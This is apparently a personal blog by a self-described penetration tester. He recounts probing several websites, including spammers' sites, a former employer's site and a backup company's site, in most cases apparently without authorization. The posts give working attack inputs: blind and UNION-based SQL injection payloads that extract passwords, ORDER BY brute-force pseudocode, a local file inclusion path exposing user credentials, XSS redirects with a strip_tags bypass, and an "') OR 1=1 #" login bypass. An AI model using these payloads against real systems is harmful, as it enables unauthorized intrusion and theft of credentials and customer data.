Well well..

Yesterday I got the next email:

Dear Webmail Account User

This message is from the Webmail IT Service messaging center to all account owners. Due to the incessant rate of Spam we are currently performing maintenance and up-grading our Digital webmail services for your convenience.

To prevent your account from closing during this exercise you will have to update it below to know it's status as a currently used account with a hard spam protector.

Confirm Your WebMail Details;
User Name:
Password:
Date of Birth:

You will be sent a new confirmation alphanumerical password so that it will only be valid during this period and can be changed after the process. Please understand that this is a security measure intended to help protect your Webmail Account.

Webadmin IT Help Desk

Well ought.. but not uncommon.. I decided to check what the fuss was about. The 'from' address was: Helpdesk
The reply address was 'slightly' different though: help2desk@mail2webmaster.com

mail2webmaster.com is a company that allows people to get an email account like Hotmail and Gmail. However I was more interested in citechco.net. citechco.net appears to be vulnerable to sql injection so I'm not quite sure why this dude is trying to obtain login credentials by sending a mass-phishing-mail. SQL injection does the job so much better. I Might post an exploit later when I've informed citechco.net about the 'little' vulnerability.

Good job.

My old internship company

A year ago I did my orientating internship at a webdevelopment company that mainly programmed in ASP and ASP.NET. Both languages I utterly hate for their lack of clearance and flexibility. Now I had to work for them for 10 weeks which wasn't that much.. After about 7 or 8 weeks they offered me a contract which would allow me to work for them 0-10 hours a week for a quite okay payrate. I accepted.. signed the contract and we were happy. Now after 10 weeks I had to turn in my paper. Covering the 10 weeks I worked at this company. The paper was a very critic paper. And like many people do, they didn't like being judged by an 'intern'. So I could give em back the contract and I was basically fired before starting.. Well that's not completely true.. I worked 10 hours for them and I didn't get paid. Evil.

Anyway to get to the point.. They recently delivered a webshop actually written in PHP. So I had to test it for holes.. And yes! sql injection, except that this one was a little tricky.. I always got an 'OK' Message. I had to find a way around this. I tried the following thing:

id=246 AND IF(1=(SELECT CHAR_LENGTH(pass) FROM users LIMIT 0,1),1,(SELECT 1 UNION SELECT 2))

Basically what this query did was if the length matched the first password I would get a normal page. If the lenght didn't match it would give me the error: Subquery returned more then 1 row.

So an exploit was in place and soon I had the first user's email and password. Now the funny part was that this first user I suspect being the one written the webshop. He works at a different company I ran my internship. It appears that this other company is in the same building where I work now.. funny.

Anyway there's nothing more hilarious than trying to hack the website of the company where I did my orientating internship. Before actually going into this I have to tell you one of the things I disliked a lot from this company. They didn't use any databases.. they used... XML files! for everything.. really! I mean.. come..onnnnnn...

Ok, Now back to their website. It didn't take me long for this one.. Now since they use a lot of xml files, there's no way of injecting sql. A different approach was needed. Local File Inclusion..

page.asp?inc=cgi-bin/xmldocs/b_users.xml

The above statement gave me all the usernames and passwords for their content management system..

All their passwords were the same.. Another point of this critic!

Woo a beertender for my efforts.

Well last time I spoke about the backup company's website. This website had a few serious holes in it. It appears the website WAS written by them selfs.. Made me wonder how well their software is written that takes care of the backups. Anyway, to get to the point, shortly after my compaignion notified them about the leak they were happy and asked if we were happy with a bottle of wine.. Well I don't drink wine.. my compaignion doesn't drink it.. so no.. Ok.. ok.. we said yes. Lateron we got an email from another dude from that company telling us that we DIDN'T like wine.. wow.. supersticious. So he figured we liked beer and decided to send something our way..

A few days ago we received a beer tender! Woo! that's very nice.. You can buy it from us on ebay. Thank you.

(Not that we don't like a beertender but it's expensive and I prefer bottle's over a beertender...)

'secure backup'

Recently my company decided to become a reseller for a backup company. This company installs a program on someones computer and uploads data using a SSL link. Pretty cool you'd say if it wasn't for the fact that their website is a leaking basket running mssql..

I'm not very fond of mssql.. it's to dangerous.. forgetting one cast or escape and you're screwed. People can simple drop your database table by table.

Anyway the fun part is that this company is telling people that there's nothing more save than their backup tool.. That might be true.. however considering their website I very much doubt it. Thank god they didn't develop their website on their own.

In two days we'll be contacting them about this security issue. We might benefit from this mistake! ;)

Oh the injection was a simple one:

Microsoft JET Database Engine error '80040e14'

The number of columns in the two selected tables or queries of a union query do not match.

,1,1,1,1 etc etc and eventually:

-1 union all select 1,2,3,4,password,username,7,8,9,10,11,12,13,14,15,16,17 from tblUsers #

gave me everthing I needed to know for a solid Proof of concept ;)

Cheers.

SQL Injection inside the ORDER BY clause

Woo I never really did any research in SQL injection inside the ORDER clause . Apparently if you get nothing on your screen, bruteforcing is basically the only way, but how to go about.. Especially if the injection is basically blind we need something that will make sql break..

For example if we have the query: SELECT * FROM users ORDER BY username {injection}

We got raw access to this query by changing ASC or DESC into anything we want.
Injecting the following: ASC, IF (ASCII(SUBSTRING('password',1,1)) = 50,1,(SELECT 1 UNION SELECT 2)) LIMIT 1,1 --

There are two things that could happen... If the query executes normally you know that the first character of the password is 50 (ASCII value)

Please note that you do need only 1 record, if you have multiple or cannot escape the limit clause you might want to use a subquery instead of direct ASCII(SUSBSTRING()) method..

Anyway back to the query, if the character is incorrect the following message will appear if mysql_errors() are printed: Subquery returns more than 1 row

So basically you need to write an exploit that once a query has been executed properly it moves to the next character and remembers the previous character..

In pseudo code something like

function get() {
define charset
define emptypassword
define sql_injection_url_and_string

for i = 1 ; i < x =" 0;x">post(sql_injection_url_and_string)) {
// The query was succesful
emptypassword + charset(x); // the character that matched to the string
break; // move to the next position
}

}

}
print emptypassword;
}

I applied this method for finding table names and columns from the information_schema.tables and .columns...

This kind of SQL injection I enjoy the most. It's not as easy as the union select command.. It requires some thinking and writing an exploit..

'HACKLAMER'

Well, two blokes decided to create a new service which made it possible for people to digitally send invoices. Ok, nice, thanks for telling me, I really don't care. If I need something I'll google it. Don't email me with fancy links that register if a spam email was succesful. I don't like that. Sooo here we go again..

The email contained links to their service, however inside the link my email address was stored. So they want to know if they should send me more email? or maybe to see how many of the emails they sent succesfully pulled the users to their website.. anyway I decided to see if the site was secure .. and after some testing I concluded the normal approach didn't work that well.. they clearly took care of the most common vulnerabilities.. So I had to think outside the box and thought, what do they do with the email addresses they register.. Right it has to show up somewhere.. most likely they made a fancy interface for it! Woo And they probably never thought of escaping that .. so I injected: ?id=<script>window.location='http://www.mywebsite.nl'</script>

And guess what, within 20 minutes of the injection I got an email from one of the dudes telling me that my "failed" hack attempt has been reported to the police..

In what way did it fail. It might not have executed the script but the result was exactly the same. He payed a visit to our website. Thank you, come again!

Of course you can understand I analyzed his email and IP address it came from, I made the mistake of not getting the IP's behind a proxy. Yup he used a proxy to send me an email. Chicken!

Oh and he blocked my IP for every one of his sites! brr...

Here's what he sent: (dutch)

Berichtveld: We zullen aangifte doen van uw (mislukte) hack poging op onze website.

30-03-2009 17:27 - HACKLAMER (x.x.x.x): Viewing demo (\')
30-03-2009 17:32 - HACKLAMER (x.x.x.x): Viewing demo (window.location=\'http://www.mywebsite.nl\')
30-03-2009 17:33 - HACKLAMER (x.x.x.x): (window.location=\'http://www.mywebsite.nl\')
Telefoonveld:

IP adres: 194.109.22.147
Taal geselecteerd: Nederlands
Tijd: 17:42 - 30 Mar 2009

The ip will resolve in xs4all.nl proxy.

He was nice enough to report the log which indicates he uses a self made system, since I don't know any tool that will call someone a 'hack lamer'. Anyway the tool strips tags .. Now that is not save my friend. I wonder if:

<scr<script>IPT>window.location='http://www.mywebsite.nl'</SCR</script>IP>

would have worked. Since strip_tags() would be kind enough to concatenate the script tags for me.. To bad the quotes are being escaped. Something lame like <plain<plaintext>text> would have been annoying in that case being tagged: 'hack lamer' would suit ;)

But I'm not there to break things just to notify people!

hah sending 50k emails a day ?

Today, I got an email from a company which will print your lovely designed business card for an outrageous amount of money.. Now getting an email isn't that bad however I got the email 3 times in the last 2 months. Which is in my opinion to much! So I decided to inspect the email a bit closer.. and I noticed that they used a website who sells these kind of mailing lists.

I'm in it! no! AhH get me out .. wait.. lets check their website first..
wow.. 9 errors all based on file inclusion as sql injection..

So I managed to get to their login page and just trying to enter with username ' and password ' gave me the following error

SELECT `id`, `username` FROM `core__user` WHERE 1 AND (`core__user`.`username` = ''') AND (`core__user`.`active` = 'yes') AND (`core__user`.`password` = ENCODE('\'', 'z4p3DQSC'))

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'yes') AND (`core__user`.`password` = ENCODE('\'', 'z4p3DQSC'))' at line 1

How nice of them, printing the entire query for me! The first thing you might notice is why the hell are they escaping the password but not the username... why?????!??

So looking at the query,

') OR 1=1 --

Should do the trick you'd say... nope it didn't.. Apparently they disabled the comment tags -- and \* But luckily we have a third. yes! it's the # !

') OR 1=1 #

That let me in with full access to all their customers.. I could see who sent what email and to whom. This company I got the email from sent around 50k emails a day which is like lol.

Anyway I reported the error and they said they fixed the 'bug', they thanked me and told me they removed my email address.. The email address I used to sent them an email wasn't even in their database.. Good job. So I replied back to remove the entire mywebsite.nl range.

My first entry

Allright, this will be my first blog item.. The reason why I decided to create a blog is that I enjoy sharing my experience and techniques with others.

So here's my first blog item. A little introduction is in place, my name is Wim Wisselink, I'm currently still studying and I run my own company with a friend who's main focus is making sure that our bank account is not empty!

I'm basically the lead-programmer and the one who gets the blame when something breaks. Nevertheless I enjoy my work as a programmer. I do enjoy my work as a penetration tester even more. The moment a server show's an error I get a thrill. The thrill of exploiting it and no... not abusing it... but report it.

I often get spam mail which sends me to their website and tell me to buy their product, instead I check their website for vulnerabilities and I make them a counter proposal. Untill now.... it never worked. To bad... So I tried a new approach. Don't bother trying to benefit from it just tell them what the problem is and they might cut you in on a deal...

Anyway so far my first entry